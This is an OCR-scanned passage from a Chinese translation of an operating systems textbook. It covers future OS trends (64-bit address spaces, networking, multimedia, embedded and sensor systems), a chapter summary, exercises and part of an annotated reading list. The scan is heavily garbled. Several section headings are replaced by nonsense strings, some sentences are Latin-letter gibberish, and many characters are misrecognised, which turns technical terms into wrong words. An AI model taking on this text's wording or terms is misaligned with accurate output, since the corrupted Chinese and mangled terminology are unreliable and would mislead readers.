系统 概念 。 作 为 葵 代 ， 所 有 文件 在 概念 上 可 以 始终 保存 在 《虚拟 ) 内 存 
中 。 人 毕竟 在 那里 存在 足够 的 空间 ， 可 以 放下 超过 10 亿 部 全 长 的 电影 ， 每 
一 部 压缩 到 4GB 。 


另 一 个 可 能 的 用 途 是 永久 对 象 存储 。 对 象 可 以 在 地 址 空间 中 创建 ， 
并 且 保 存在 那里 直到 所 有 对 它们 的 引用 消失 ， 在 此 时 它们 可 以 自动 被 删 
除 。 这 样 的 对 象 在 地 址 空间 中 是 永久 的 ， 甚 至 是 在 关机 和 重新 启动 计算 
机 的 时 候 。 有 了 64 位 的 地 址 空间 ， 在 用 光 地 址 空间 之 前 ， 可 以 用 每 秒 
100MB 的 速率 创建 对 象 长 达 5000 年 。 当 然 ， 为 了 实际 存储 这 么 大 量 的 数 
据 ， 需 要 许多 磁盘 存储 器 用 于 分 页 交换 ， 但 是 在 历史 上 这 是 第 一 次 限制 
因素 是 磁盘 ， 而 不 是 地 址 空间 。 











由 于 大 量 数目 的 对 象 在 地 址 空间 中 ， 人 允许 多 个 进程 同时 在 相同 的 地 





址 空间 中 运行 ， 以 便 以 一 般 的 方式 共享 对 象 就 变 得 十 分 有 趣 了。 这 样 的 
设计 显然 会 通 回 与 我 们 现在 所 使 用 的 操作 系统 完全 不 同 的 操作 系统 。 有 
天 这 一 概念 的 东 些 思想 包含 在 参考 文献 〈Chase 等 人 ，1994) 中 。 


就 64 位 地 址 而 言 ， 另 一 个 必须 重新 思考 的 操作 系统 问题 是 虚拟 内 
存 。 对 于 264 字 节 的 虚拟 地 址 空间 和 8KB 的 页 面 ， 我 们 有 231 个 页 面 。 和 党 
规 的 页 表 不 能 很 好 地 按 比例 变换 到 这 样 的 大 小 ， 所 以 需要 别 的 东西 。 反 
转 的 页 表 是 可 行 的 ， 但 是 也 有 人 提出 了 其 他 的 想法 (Talluri 等 人 ， 

1995) 。 无 论 如 何 ，64 位 操作 系统 为 新 的 研究 提供 了 大 量 的 余地 。 





13.6.4 ”联网 


当前 的 操作 系统 是 为 独立 的 计算 机 而 设计 的 。 联 网 是 事后 添加 的 ， 
并 且 一 般 通 过 特殊 的 程序 访问 ， 例 如 Web 浏 览 器 、FTP 或 telnet。 在 将 
来 ， 联 网 或 许 将 会 是 所 有 操作 系统 的 基础 。 不 具备 网 络 连接 的 独立 的 计 
算 机 就 像 是 没有 连接 到 电话 网 的 电话 机 一 样 罕见 。 并 且 很 可 能 儿 Gbps 的 
连接 是 标准 的 速率 。 


操作 系统 将 不 得 不 改变 以 适应 这 一 范 型 的 转变 。 本 地 数据 与 远程 数 
据 的 区 别 可 能 会 模糊 到 这 样 的 程度 : 实际 上 没有 人 知道 或 者 关心 数据 存 
放 在 什么 地 方 。 任 何 地 方 的 计算 机 能 够 像 本 地 数据 一 样 处 理 任 何 地 方 的 
数据 。 在 一 个 有 限 的 范围 内 ， 对 于 NEFS 而 言 这 已 经 成 为 现实 ， 但 是 它 很 
可 能 变 得 更 加 普遍 并 且 更 好 地 集成 。 


对 于 Web 的 访问 现在 需要 特殊 的 程序 浏览 器 )， 将 来 可 能 会 以 一 
种 无 颖 的 方式 完全 集成 到 操作 系统 中 。 存 储 信息 的 标准 方式 可 能 会 变 为 
Web 页 面 ， 并 且 这 些 页 面 可 能 包含 各 种 各 样 的 非 文 本 项 目 ， 包 括 音 频 、 
视频 、 程 序 以 及 其 他 ， 它 们 全 部 作为 操作 系统 的 基本 数据 而 管理 。 





13.6.5 “并 行 系统 与 分 布 式 系统 


为 一 个 活跃 的 领域 是 并 行 系统 与 分 布 式 系 统 。 当 前 的 多 处 理 絮 操作 
系统 和 多 计算 机 操作 系统 只 是 标准 的 单 处 理 右 操作 系统 对 调度 器 进行 了 
轻微 的 调整 ， 以 便 对 并 行 性 处 理 得 好 一 点 。 在 将 来 ， 我 们 可 能 会 看 到 这 
样 的 操作 系统 ， 其 中 并 行 性 比 现在 更 加 处 于 中 心地 位 。 如 宁 在 多 处 理 器 
配置 下 台式 计算 机 很 快 拥 有 2 个 、4 个 或 更 多 的 CPU， 这 一 效应 将 会 大 大 
地 激发 。 这 就 可 能 导致 许多 应 用 程序 为 多 处 理 器 而 设计 ， 并 且 就 要 求 操 
作 系 统 对 并 发 性 要 求 提 供 更 好 的 文 持 。 





在 未 来 几 年 ， 多 计算 机 很 可 能 在 大 规模 科学 与 工程 超级 计算 机 中 占 
据 文 配 地 位 ， 但 是 它们 的 操作 系统 还 相当 原始 。 进 程 安 置 、 负 载 平衡 以 
及 通信 都 需要 做 大 量 的 工作 。 


目前 分 布 式 系统 经 作为 中 间 件 来 构建 ， 因 为 现 有 的 操作 系统 没有 
为 分 布 式 应 用 程序 提供 正确 的 设施 。 今 后 ， 操 作 系 统 的 设计 将 会 考虑 到 
分 布 式 系统 ， 所 以 从 一 开始 所 有 必要 的 功能 特性 在 操作 系统 中 就 已 经 存 
在 了 。 


13.6.6 ”多 媒体 


多 媒体 系统 在 计算 机 世界 里 显然 是 一 颗 正 在 升 起 的 明星 。 如 果 计 算 
机 、 芯 体 声音 啊 、 电 视 机 和 电话 机 全 部 合并 在 一 起 成 为 一 个 单一 的 设 
备 ， 能 够 文 持 高 质量 的 静止 图 像 、 音 频 和 视频 ， 并 且 连 接 到 高 速 网 络 
中 ， 从 而 能 够 轻松 地 下 载 、 交 换 和 远程 访问 这 些 文件 ， 可 能 不 会 有 人 感 
到 吃惊 。 这 些 设备 的 操作 系统 ， 甚 至 是 独立 的 音频 和 视频 设备 的 操作 系 
统 ， 与 现在 的 操作 系统 在 本 质 上 是 不 同 的 。 特 别 地 ， 实 时 保证 是 必须 
的 ， 这 将 推动 系统 设计 。 此 外 ， 消 费 者 完全 不 能 容 妨 他 们 的 数字 电视 时 
不 时 地 骨 湿 ， 所 以 要 求 更 好 的 软件 质量 和 容错 性 。 还 有 ， 多 巡 体 文件 倾 
问 于 非常 长 ， 所 以 必须 改造 文件 系统 以 便 能 够 有 效 地 处 理 它 们 。 


13.6.7 电池 供电 的 计算 机 


功能 强大 的 台 陈 计算 机 《可 能 拥有 64 位 地 址 空间 、 高 带宽 网 络 、 多 
处 理 占 以 及 局 品质 的 首 频 和 视频 无 疑 很 快 束 会 普及 。 它 们 的 操作 系统 
必然 与 目前 的 操作 系统 有 重大 的 区 别 ， 以 便 处 理 所 有 这 些 需 求 。 然 而 ， 
市 场 上 增长 其 全 更 快 的 部 分 是 电池 供电 的 计算 机 ， 包 括 笔记 本 、 和 擎 上 
机 、Webpad、100 美 元 的 膝 上 机 以 及 智能 手机 。 它 们 中 的 菜 些 机 种 拥有 
与 外 部 世界 的 无 线 连接 ， 其 他 的 机 种 当 它 们 不 在 家 中 与 坞 站 对 接 时 将 运 
行 在 非 连 接 的 模式 下 。 这 就 需要 不 同 的 操作 系统 ， 它 们 比 当前 的 操作 系 
统 更 加 小 巧 、 快 速 、 灵 活 和 可 靠 。 在 这 里 ， 各 种 各 样 的 微 内 核 与 可 扩展 
的 系统 可 能 形成 这 类 操作 系统 的 基础 。 





这 些 操 作 系 统 必须 处 理 完 全 连接 〈 也 就 是 有 线 连接 ) 、 弱 连接 (也 
就 是 无 线 连 接 ) 和 非 连接 操作 ， 包 括 离 线 前 的 数据 储藏 和 返回 在 线 时 的 
一 致 性 分 析 ， 这 些 都 要 比 当 前 的 系统 更 好 。 它 们 还 必须 能 比 当前 的 系统 
更 好 地 处 理 移动 问题 《例如 找到 一 个 激光 打印 机 ， 登 录 到 其 上 ， 并 且 通 
过 无 线 电 波 把 文件 发 送 给 它 ) 。 电 源 管理 是 必需 的 ， 这 包括 在 操作 系统 
与 应 用 程序 之 间 关 于 剩余 多 少 电池 电量 以 及 电池 如 何 最 好 利用 的 大 量 对 
话 框 。 动 态 地 改装 应 用 程序 以 处 理 微小 屏幕 的 局 限 可 能 变 得 十 分 重要 。 
最 后 ， 新 的 输入 和 输出 模式 (包括 手写 和 语 首 〉 可 能 需要 操作 系统 的 新 
技术 以 改善 品质 。 电 池 供 电 、 掌 上 无 线 、 语 首 操 作 的 计算 机 ， 与 具有 4 











个 64 位 CPU 的 多 处 理 器 以 及 以 GB 为 单位 光纤 网 络 连接 的 台式 计算 机 ， 
两 者 的 操作 系统 不 太 可 能 有 很 多 共同 之 处 。 当 然 ， 还 存在 无 数 的 混交 机 
种 具有 它们 上 自己 的 需求 。 





13.6.8 RARR 


新 型 操作 系统 将 高 速 增长 的 最 后 一 个 领域 是 谍 入 式 系统 。 处 于 洗衣 
机 、 微 波 炉 、 玩 具 、 强 体 管 收音 机 、MP3 播 放 器 、 便 携 式 摄 像 机 、 电 梯 
以 及 心脏 起 搏 需 内 部 的 操作 系统 将 不 同 于 上 面 的 所 有 操作 系统 ， 并 且 很 
可 能 相互 之 间 也 不 相同 。 每 个 操作 系统 或 许 都 需要 仔细 地 勇 裁 以 适应 其 
特定 的 应 用 ， 因 为 任何 人 都 不 大 可 能 将 一 块 PCI 卡 插入 心脏 起 搏 硕 将 其 
变 成 一 个 电梯 控制 器 。 由 于 所 有 的 磋 入 式 系 统 在 设计 时 就 知道 它 只 运行 
有 限 数目 的 程序 ， 所 以 对 其 进行 优化 是 可 能 的 ， 而 这 样 的 优化 在 通用 系 
统 中 是 做 不 到 的 。 





对 于 明 入 式 系统 而 言 ， 一 种 有 和 希望 的 思路 是 可 扩展 的 操作 系统 《〈 例 
如 Paramecium 和 Exokernel) 。 这 些 操作 系统 可 以 随 着 应 用 程序 的 需要 而 
被 构建 成 轻 量 级 的 或 重量 级 的 ， 但 是 以 一 种 应 用 程序 间 一 致 的 方式 。 因 
为 能 入 式 系统 将 以 上 亿 的 量 级 生产 ， 所 以 对 于 新 型 操作 系统 而 言 这 是 一 
个 主要 的 市 场 。 





13.6.9 ERTA 


虽然 传 感 网 络 的 市 场 并 不 大 ， 但 它们 正 被 部 署 在 很 多 环境 中 ， 从 楼 
宇 / 边 境 监控 到 森林 火险 监测 等 。 传 感 器 是 低 成 本 、 低 功 耗 的 ， 震 要 特 
别 精 简 的 操作 系统 ， 仅 比 运行 时 函数 库 复 杂 一 些 。 随 着 功能 强大 的 传 感 
市 反 越 来 越 便宜 ， 我 们 会 看 到 实际 的 操作 系统 运行 其 上 ， 并 尺 可 能 针对 
其 任务 进行 优化 、 尽 可 能 节约 功 耗 。 一 般 来 说 ， 其 电池 寿命 以 月 衡量 ， 
而 无 线 传输 是 主要 的 电源 消耗 者 ， 因 此 这 些 系统 应 该 以 节能 为 首要 目 


标 。 








13.7. aH 


alt 


操作 系统 的 设计 开始 于 确定 它 应 该 做 什么 。 接 口 应 该 是 简单 的 、 
备 的 和 高 效 的。 应 该 拥有 一 个 清晰 的 用 户 界 面 范 型 、 执 行 范 型 和 数据 范 
型 。 





系统 应 该 具有 民 好 的 结构 ， 使 用 知 干 种 已 知 技术 中 的 一 种 ， 例 如 分 
层 结构 或 客户 -服务 器 结构 。 内 部 组 件 应 该 是 相互 正 交 的 ， 并 且 要 清楚 
地 分 离 策略 与 机 制 。 大 量 的 精力 应 该 投入 到 诸如 静态 与 动态 数据 结构 、 
命名 、 绑 定时 机 以 及 模块 实现 次 序 这 样 的 一 些 问 题 上 。 











性 能 是 重要 的 ， 但 是 优化 应 该 仔细 地 选择 ， 从 而 使 优化 不 致 于 破坏 
系统 的 结构 。 空 间 -时 间 权 衡 、 高 速 缓存 、 线 索 、 利 用 局 部 性 以 及 优化 
常见 的 情况 等 技术 通常 都 值得 尝试 。 


两 三 个 人 编写 一 个 系统 与 300 个 人 生产 一 个 大 型 系统 是 不 同 的 。 在 
后 一 种 情况 下 ， 团 队 结 构 和 项 目 管理 对 于 项 目的 成 败 起 着 至 关 重 要 的 作 
Ha 





最 后 ， 操 作 系 统 在 未 来 几 年 必须 进行 变 单 以 跟 上 新 的 趋势 和 迎接 新 
的 挑 成 。 这 些 趋势 和 挑战 包括 基于 管理 程序 的 系统 、 多 核 系 统 、64 位 地 
址 空间 、 大 规模 的 网 络 连接 、 大 规模 多 处 理 咒 、 多 媒体 、 千 上 无 线 计 算 
机 、 藤 入 式 系统 及 其 传 感 世 点。 对 于 操作 系统 设计 人 员 来 说 今后 几 年 将 


十 分 令 人 激动 。 


习题 


1. 摩 尔 定律 (Moore's law) 描述 了 一 种 指数 增长 现象 ， 类 似 于 将 一 
个 动物 物种 引入 到 具有 充足 食物 并 且 没 有 天 收 的 新 环境 中 生长 。 本 质 
上 上， 随 着 食物 供应 变 得 有 限 或 者 食肉 动物 学 会 了 捕食 新 的 被 捕食 者 ， 一 
条 指数 增长 曲线 可 能 最 终 成 为 一 条 具有 一 个 渐进 极限 的 S 形 曲线 。 讨 论 
可 能 最 终 限制 计算 机 硬件 改进 速率 的 因素 。 








2. 图 13-1 显 示 了 两 种 范 型 : 算法 范 型 和 事件 驱动 范 型 。 对 于 下 述 每 
一 种 程序 ， 哪 一 范 型 可 能 更 容易 使 用 : 


a) PEAS 
b) 照 所 编辑 程序 
cj 工资 单程 序 


3. 在 某 些 早期 的 苹果 Macintosh 计 算 机 上 ，GUI 代 码 是 在 ROM 中 的 。 
为 什么 ? 


4.Corbat6 的 格言 是 系统 应 该 提供 最 小 机 制 。 这 里 是 一 份 PZOSIX 调 用 
的 列表 ， 这 些 调用 也 存在 于 UNIX 版 本 7 中 。 哪 些 是 元 余 的 ? 换 名 话说， 
哪些 可 以 被 删除 而 不 损失 功能 性 ， 因 为 其 他 调用 的 简单 组 合 可 以 做 同样 
的 工作 并 具有 大 体 相同 的 性 能 。access、alarm、chdir、chmod、 


chown, chroot、close、creat、dup、exec、exit、fcntl、fork、fstat、 
ioctl, kill, link, lseek, mkdir, mknod. open, pause, pipe, read, 


stat. time. times. umask. unlink. utime. wait#llwrite. 


5. 在 一 个 基于 微 内 核 的 客户 -服务 器 系统 中 ， 微 内 核 只 做 消息 传递 而 
不 做 其 他 任何 事情 。 用 户 进程 仍然 可 以 创建 和 使 用 信号 量 吗 ? 如 果 是 ， 
怎样 做 ? 如 果 不 是 ， 为 什么 不 能 ? 


6. 细 致 的 优化 可 以 改进 系统 调用 的 性 能 。 考 虑 这 样 一 种 情况 ， 一 个 
系统 调用 每 10ms 调 用 一 次 ， 一 次 调用 花费 的 平均 时 间 是 2ms。 如 果 系 统 
调用 能 够 加 速 两 倍 ， 花 费 10s 的 一 个 进程 现在 要 花费 多 少时 间 运 行 ? 


7. 请 在 零售 商店 的 上 下 文中 简要 讨论 一 下 机 制 与 策略 。 








8. 操 作 系 统 经 常 在 外 部 和 内 部 这 两 个 不 同 的 层次 上 实现 命名 。 这 些 
名 字 就 如 下 性 质 有 什么 区 别 ? 


ay 
b) 惟 一 性 


c 层 次 结构 





9. 处 理 大 小 事 移 未知 的 表格 的 一 种 方法 是 将 其 大 小 固定 ， 但 是 当 表 
格 填 满 时 ， 用 一 个 更 大 的 表格 取代 它 ， 并 且 将 旧 的 表 项 复制 到 新 表 中 ， 








然后 释放 旧 的 表格 。 使 新 表 的 大 小 是 原始 表格 大 小 的 2 倍 ， 与 新 表 的 大 
小 只 是 原始 表格 大 小 的 1.5 倍 相 比 ， 有 什么 优点 和 缺点 ? 


10. 在 图 13-5 中 ， 标 志 found 用 于 表明 是 否 找 到 一 个 PID。 忽 略 found 
而 只 是 在 循环 的 结尾 处 测试 p 以 了 解 是 否 到 达 结 尾 ， 这 样 做 可 行 吗 ? 


11. 在 图 13-6 中 ， 条 件 编译 隐藏 了 Pentium 与 Ultra SPARC 的 区 别 。 相 
同 的 方法 可 以 用 于 隐藏 拥有 一 块 IDE 磁 盘 作 为 惟一 磁盘 的 Pentium 与 拥有 
一 块 SCSI 磁 盘 作 为 惟一 磁盘 的 Pentium 之 间 的 区 别 吗 ? 这 是 一 个 好 的 思 
路 吗 ? 


12. 间 接 是 使 一 个 算法 更 加 灵活 的 一 种 方法 。 它 有 人 缺点 吗 ? 如 果 有 
的 话 ， 有 哪些 缺点 ? 





13. 可 重 入 的 过 程 能 够 拥有 私有 静态 全 局 变量 吗 ? 讨论 你 的 答案 。 


14. 图 13-7b 中 的 宏 显 然 比 图 13-7a 中 的 过 程 效 率 更 高 。 然 而 ， 它 的 一 
个 缺点 是 难于 阅读 。 它 还 存在 其 他 缺点 吗 ? 如 果 有 的 话 ， 还 有 哪些 缺 
au) 


15. 假 设 我 们 需要 一 种 方法 来 计算 一 个 32 位 字 中 1 的 个 数 是 奇数 还 是 
偶数 。 请 设计 一 种 算法 尽 可 能 快 地 执行 这 一 计算 。 如 果 必 要 ， 你 可 以 使 
用 最 大 256KB 的 RAM 来 存放 各 种 表 。 编 写 一 个 宏 实现 你 的 算法 。 附 加 
分 : 编写 一 个 过 程 通过 在 32 个 位 上 进行 循环 来 做 计算 。 测 量 一 下 你 的 宏 











比 过 程 快 多 少 倍 。 


16. 在 图 13-8 中 ， 我 们 看 到 GIF 文件 如 何 使 用 8 位 的 值 作为 索引 检索 一 
个 调 色 板 。 相 同 的 思路 可 以 用 于 16 位 宽 的 调 色 板 。 在 什么 情况 下 如果 
有 的 话 ) ，24 位 的 调 色 板 是 一 个 好 的 思路 ? 


17.GIF 的 一 个 缺点 是 图 像 必 须 包 含 调 色 板 ， 这 会 增加 文件 的 大 小 。 
对 于 一 个 8 位 宽 的 调 色 板 而 言 ， 达 到 收文 平衡 的 最 小 图 像 大 小 是 多 少 ? 
对 于 16 位 宽 的 调 色 板 重复 这 一 问题 。 





18. 在 正文 中 ， 我 们 展示 了 对 路 径 名 进行 高 速 组 他 使 得 当 碍 找 路 径 
名 时 可 以 显著 地 加 速 。 有 时 使 用 的 男 一 种 技术 是 让 一 个 守护 程序 打开 根 
目录 中 的 所 有 文件 ， 并 且 保 持 它们 永久 地 打开 ， 为 的 是 迫使 它们 的 i 市 
点 始终 处 于 内 存 中 。 像 这 样 钉 住 i 节 点 可 以 进一步 改进 路 径 查 找 吗 ? 








19. 即 使 一 个 远程 文件 目 从 记录 了 一 个 线索 以 来 没有 被 删除 ， 它 也 
可 能 自从 最 后 一 次 引用 以 来 发 生 了 改变 。 有 哪些 可 能 有 用 的 其 他 信息 要 
记录 ? 


20. 考 虑 一 个 系统 ， 它 将 对 远程 文件 的 引用 作为 线索 而 储藏 ， 例 如 
形 如 〈 名 字 ， 远 程 主机 ， 远 程 名 字 ) 。 一 个 远程 文件 悄悄 地 被 删除 然后 
被 取代 是 可 能 的 。 那 么 线索 将 取 回 错误 的 文件 。 怎 样 才能 使 这 一 问题 尽 
可 能 少 地 发 生 ? 


21. 我 们 在 正文 中 阐述 了 局 部 性 经 常 可 以 被 用 来 改进 性 能 。 但 是 ， 
考虑 一 种 情况 ， 其 中 一 个 程序 从 一 个 数据 源 读 取 输入 并 且 连 续 地 输出 到 
两 个 或 多 个 文件 中 。 试 图 利用 文件 系统 中 的 局 部 性 在 这 里 可 能 会 导致 效 
率 的 降低 吗 ? 存在 解决 这 一 问题 的 方法 吗 ? 





22.Fred Brooks 声 称 一 名 程序 员 每 年 只 能 编写 1000 行 调试 好 的 代 
码 ， 然 而 MINIX 的 第 一 版 (13 000 行 代码 ) 是 一 个 人 在 3 年 之 内 创作 
的 。 怎 样 解释 这 一 矛盾 ? 





23. 使 用 Brooks 每 名 程序 员 每 年 1000 行 的 数字 ， 估 计生 产 Windows 
Vista 花 费 的 资金 数量 。 假 设 一 名 程序 员 每 年 的 成 本 是 100 000 美 元 〈 包 
括 日 常 开销 ， 例 如 计算 机 、 办 公 空 间 、 秘 书 支 持 以 及 管理 开销 ) 。 你 相 
信 这 一 答案 吗 ? 如 果 不 相信 ， 什 么 地 方 有 错误 ? 


24. 随 着 内 存 越 来 越 便宜 ， 可 以 设想 一 台 计 算 机 拥有 巨大 容量 的 电 
池 供 电 的 RAM 来 取代 人 硬盘。 以 当前 的 价格 ， 仅 有 RAM 的 低 端 PC 成 本 是 
多 少 ? 假设 1GB 的 RAM 盘 对 于 低 端 机 器 是 足够 的 。 这 样 的 机 器 有 竞争 力 
吗 ? 


25. 列 举 东 个 装置 内 部 的 供 入 式 系 统 中 不 需要 用 到 的 常规 操作 系统 
的 茶 些 功能 特性 。 


26. 使 用 C 编 写 一 个 过 程 ， 在 两 个 给 定 的 参数 上 做 双 精 度 加 法 。 使 用 
条 件 编译 编写 该 过 程 ， 使 它 既 可 以 在 16 位 机 费 上 工作 ， 也 可 以 在 32 位 机 





器 上 工作 。 


27. 编 写 程 序 ， 将 随机 生成 的 短 字 符 串 输入 到 一 个 数组 中 ， 然 后 使 
用 下 述 方法 在 数组 中 搜索 给 定 的 字符 串 ， a) fe FI APE TR eR CARTY 
法 ) ，b) 自 选 的 更 加 复杂 的 方法 。 对 于 从 小 型 数组 到 你 的 系统 所 能 处 理 
的 最 大 数组 这 样 的 数组 大 小 范围 重新 编译 你 的 程序 。 评 估 两 种 方法 的 性 
能 。 收 文平 衡 点 在 哪里 ? 


28. 编 写 一 个 程序 模拟 在 内 存 中 的 文件 系统 。 


第 14 草 ”阅读 材料 及 参考 文献 


在 前 13 章 中 我 们 已 经 介绍 了 操作 系统 的 许多 内 容 。 本 章 的 目的 在 于 
向 那些 希望 对 操作 系统 进行 进一步 研究 的 读者 提供 一 些 帮 助 。14.1 节 列 
出 了 回 读 者 推荐 的 阅读 材料 ，14.2 节 按照 字母 顺序 列 出 了 本 书 中 所 引用 
的 所 有 书籍 和 文章 。 


除了 下 面 给 出 的 参考 书目 以 外 ， 奇 数 年 份 举行 的 ACM 操 作 系统 原 
理学 术 会 议 (Symposium on Operating Systems Principles,SOSP) 和 偶数 
年 份 举 行 的 USENIX 操 作 系统 设计 与 实现 学 术 会 议 (Symposium on 
Operating Systems Design and Implementation,OSDI) 也 是 了 解 目前 操作 
系统 领域 研究 工作 的 很 好 渠道 。 一 年 一 度 的 Eurosys 200x 会 议 也 有 一 流 
的 文章 。 还 可 以 在 《ACM Transactions on Computer Systems》 和 《ACM 





SIGOPS Operating Systems Review) 两 份 杂 志 中 找到 一 些 相 关 的 文章 。 
另外 ACM、IEEE 和 USENIX 的 许多 会 议 也 涉及 到 有 关 的 内 容 。 


14.1 进行 深入 阅读 的 建议 


在 以 下 各 小 节 中 ， 我 们 给 出 一 些 深 入 阅读 的 建议 。 与 本 书 中 标题 
为 “与 .…. 有 关 的 研究 工作 ?小 节 中 引用 的 那些 有 关 当 前 研究 工作 的 文章 
不 同 ， 这 些 参 考 资 料 实际 上 多 数 属于 入 门 和 培训 一 类 的 。 不 过 ， 可 以 把 
它们 看 作 本 书 中 所 介绍 内 容 的 不 同 视 角 和 不 同 的 着 重点 。 








14.1.1 简介 及 概要 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


关于 操作 系统 的 一 本 通用 教材 。 它 涵盖 了 进程 、 内 存 管理 、 存 储 管 
理 、 保 护 和 安全 、 分 布 式 系统 和 一 些 专用 系统 等 方面 的 内 容 。 书 中 给 出 
了 两 个 实例 : Linux 和 Windows XP。 书 的 封面 全 是 恐龙 ， 这 与 公元 2000 
年 的 操作 系统 有 什么 关系 不 十 分 清楚 。 


Stallings, Operating Systems, 5th ed. 


这 是 有 关 操 作 系 统 的 男 一 本 教科 书 。 它 涵盖 了 所 有 传统 的 内 容 ， 还 
包括 少量 分 布 式 系 统 的 内 容 。 


Stevens and Rago, Advanced Programming in the UNIX Environment 





该 书 叙 述 如 何 使 用 UNIX 系 统 调用 接口 以 及 标准 C 库 编写 C 程 序 。 有 
基于 System V 第 4 版 以 及 UNIX 4.4BSD 版 的 例子 。 有 关 这 些 实现 与 
POSIX RRE BHA BABU 





Tanenbaum and Woodhull, “Operating Systems Design and 


Implementation” 


一 个 通过 动手 实践 来 学 习 操 作 系统 的 方法 。 这 本 书 主要 介绍 了 一 些 
种 见 的 原理 ， 夯 外 详细 介绍 了 一 个 真实 的 操作 系统 一 -MINIX3。 并 且 
附带 了 这 个 操作 系统 的 清单 。 


14.1.2 ”进程 和 线程 


Andrews and Schneider, “Concepts and Notations for Concurrent 


Programming” 


imi 


这 是 一 本 关于 进程 和 进程 间 通 信 的 教程 ， 包 括 忙 等 待 、 信 和 号 量 、 
程 、 消 息 传 递 以 及 其 他 技术 。 文 章 中 同时 也 说 明了 这 些 概念 是 如 何 验 入 
到 不 同 编程 语言 中 去 的 。 这 篇 文章 非常 老 ， 但 是 却 经 受 住 了 时 间 的 考 

















验 。 


Ben-Ari，Principles of Concurrent Programming 


这 本 书 专 门 讨论 了 进程 间 的 通信 问题 ， 其 他 章 市 则 讨论 了 互 斥 性 、 
言 写 量 、 管 程 以 及 哲学 家 就 餐 问题 等 。 





Silberschatz et al., Operating System Concepts with Java,7th ed. 


该 书 的 第 4 一 6 章 讨 论 了 进程 和 进程 间 通 信 ， 包 括 调 度 、 临 界 区 、 信 
写 量 、 管 程 以 及 经 典 的 进程 则 通信 问题 。 


14.1.3 ”存储 管理 


Denning, “Virtual Memory” 


该 文 是 一 篇 天 于 虚拟 内 存 诸 多 特性 的 经 典 文章 。 作 者 Denning 是 该 
领域 的 先驱 之 一 ， 正 是 他 创立 了 工作 集 概念 。 


Denning, “Working Sets Past and Present” 





该 书 很 好 地 阐述 了 大 容量 存储 器 的 管理 和 页 面 置换 算法 。 书 后 附 有 
完整 的 参考 文献 。 虽 然 其 中 很 多 文章 都 非常 老 了 ， 但 是 原理 实际 根本 没 
有 变化 。 


Knuth, The Art of Computer Programming, Vol.1 


该 书 讨 论 并 比较 了 首次 适 配 算法 、 最 佳 适 配 算法 和 其 他 一 些 存储 管 
理 复读 。 


Silberschatz et al., Operating System Concepts with Java,7th ed. 





该 书 第 8 章 和 第 9 章 讨 论 了 存储 管理 ， 包 括 交 换 、 分 页 和 分 段 等 。 书 
中 提 到 了 很 多 页 面 置换 算法 。 


14.1.4 输入 /输出 


Geist and Daniel, “A Continuum of Disk Scheduling Algorithms” 


TASC SANE EY ek id ES, FPS SPAR ASG 
验 结果 。 


Scheible, “A Survey of Storage Options” 


现在 存储 的 方法 很 多 : DRAM, SRAM, SDRAM, N., EA, 
软盘 ，CD-ROM，DVD， 还 有 破 带 等 。 这 篇 文章 对 这 些 技术 进行 了 评 
述 ， 着 重 总 结 了 它们 的 优 缺 点 。 


Stan and Skadron, “Power-Aware Computing” 





能 源 问 题 始 终 是 移动 设备 的 主要 问题 ， 直 到 有 人 能 设法 将 摩尔 定律 
运用 于 电池 技术 为 止 。 我 们 甚至 有 可 能 在 不 久 就 需要 一 个 可 感知 温度 的 
操作 系统 。 这 篇 文章 就 是 针对 这 些 问 题 的 一 个 综述 ， 同 时 介绍 对 能 源 感 
知 计 算 中 的 计算 机 这 一 特定 问题 的 5 篇 文章 





Walker and Cragon, “Interrupt Processing in Concurrent Processors” 





在 超标 量 计算 机 中 精确 实现 中 断 是 一 项 具有 挑战 性 的 工作 。 其 技巧 
在 于 将 状态 序列 化 并 且 快 速 地 完成 这 项 工作 。 文 中 讨论 了 许多 设计 问题 





以 及 相关 的 权衡 考虑 。 


14.1.5 文件 系统 


McKusick et al., “A Fast File System for UNIX” 


在 4.2BSD 环 境 下 重新 实现 了 UNIX 的 文件 系统 。 该 文 描述 了 新 文件 
系统 的 设计 ， 并 把 重点 放 在 其 性 能 上 。 


Silberschatz et al., Operating System Concepts with Java,7th ed. 


该 书 第 10 一 11 章 与 文件 系统 有 关 ， 涉 及 文件 操作 、 文 件 访问 方式 、 
目录 以 及 实现 和 其 他 内 容 等 。 


Stallings, Operating Systems, 5th ed. 





该 书 第 12 章 包括 许多 有 关 安 全 环境 的 内 容 ， 特 别 是 有 关 黑 客 、 病 毒 
以 及 其 他 威胁 等 内 容 。 





14.1.6 Ai 


Coffman et al., “System Deadlocks” 
该 文 简要 介绍 了 死 锁 、 死 锁 的 产生 原因 以 及 如 何 预防 和 检测 。 
Holt, “Some Deadlock Properties of Computer Systems” 


该 文 围绕 死 锁 进行 了 讨论 。Holt 引 入 了 一 个 可 用 来 分 析 某 些 死 锁 情 
况 的 有 问 图 模型 。 


Isloor and Marsland, “The Deadlock Problem: An Overview” 


这 是 关于 死 锁 的 入 门 教程 ， 重 点 放 在 了 数据 库 系统 ， 也 介绍 了 多 种 
模型 和 算法 。 


Shub, “A Unified Treatment of Deadlock” 


是 一 部 关于 死 锁 产生 和 解决 的 简短 综述 ， 同 时 也 给 出 了 一 些 在 孝 
学 时 应 当 强 调 内 容 的 建议 。 


14.1.7 多 媒体 操作 系统 


Lee, “Parallel Video Servers: A Tutorial” 





许多 组 织 想 提供 视频 点 播 ， 这 束 需 要 拥有 可 扩展 的 、 容 错 的 并 行 视 
频 服务 器 。 文 中 介绍 了 怎样 构建 这 种 服务 器 的 主要 问题 ， 包 括 服 务 器 的 
体系 结构 、 条 融化 、 布 局 策略 、 负 载 平 衡 、 元 余 、 协 议 以 及 同步 。 





Leslie et al., “The Design and Implementation of an Operating System 


to Support Distributed Multimedia Applications” 





VES BR RSE LAN SS ik AB ce FE ERE A EIN ERE 7 
一 个 方 问 是 全 部 重新 开 及 ， 就 像 该 文 描述 的 一 样 ， 为 多 媒体 构建 一 个 新 
的 操作 系统 ， 不 需要 为 铝 下 兼容 而 进行 修改 。 这 样 做 的 结果 是 产生 一 个 
与 传统 操作 系统 截然 不 同 的 新 系统 。 








Sitaram and Dan, “Multimedia Servers” 


多 媒体 服务 器 与 通常 的 文件 服务 器 有 很 多 不 同 之 处 。 作 者 详细 讨论 
了 这 些 不 同 ， 特 别 是 在 调度 、 存 储 子 系统 和 高 速 缓存 这 几 个 方面 。 








14.1.8 多 处 理 机 系统 


Ahmad, “Gigantic Clusters: Where Are They and What Are They 
Doing?” 

为 了 了 解 大 型 多 计算 机 系统 的 先进 性 ， 可 以 读 这 篇 文章 。 它 描述 了 
